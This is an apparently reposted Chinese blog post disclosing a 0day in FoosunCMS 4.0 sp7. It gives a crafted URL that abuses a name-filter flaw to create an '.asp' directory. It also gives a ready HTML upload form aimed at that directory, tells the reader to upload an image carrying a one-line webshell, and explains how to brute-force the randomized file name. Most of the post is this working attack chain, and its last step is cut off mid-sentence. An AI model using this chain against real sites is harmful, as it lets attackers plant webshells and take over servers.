风讯4.0 sp7 0day漏洞

转自:零客 发现者：bloodsword bink
漏洞描述：建立目录的地方，名称过滤上有失误，导致可以绕过过滤建立一个.asp目录
首先注册个账号访问http://www.xxx.com/User/CommPages/FolderImageList.asp?f_UserNumber=06150583700&Type=AddFolder&Path=/userfiles/

06150583700/aaa.asp//&CurrPath=/userfiles/06150583700
其中这个06150583700是你的userid，登录了直接可以看到，建立一个.asp目录
因为风讯浏览目录的地方也过滤了.，所以建立的子目录进不去。本地构造表单：
<form name=”FileForm” method=”post” enctype=”multipart/form-data” action=”http://www.xxx.com/User/Commpages/UpFileSave.asp?Path=/userfiles/06150583700/aaa.asp”>
    <input type=”hidden” name=”AutoReName” value=”2″><br>
    <input type=”hidden” name=”Path” value=”/userfiles/06150583700/aaa.asp”>
    <input type=”file” size=”20″ name=”File1″>
    <input type=”hidden” name=”FilesNum” value=”1″>
    <input type=”submit” id=”BtnSubmit” name=”Submit” value=” 确 定 “>
    <input type=”reset” id=”ResetForm” name=”Submit3″ value=” 重 填 “>
</form>
传个夹带一句话的图片上去
恶心的地方来了，传上去的文件名是日期+时间+5位随机数（可能是4位3位2位1位，反正最大5位），这个我跟bink研究了半天，没有
办法看到-_-，用管中窥豹有个暴力猜接上传路径的功能，先在正常目录里上传个文件，卡一下本地跟远程的时间差，然后传到.asp

收藏、分享这篇文章!

Tags: 0day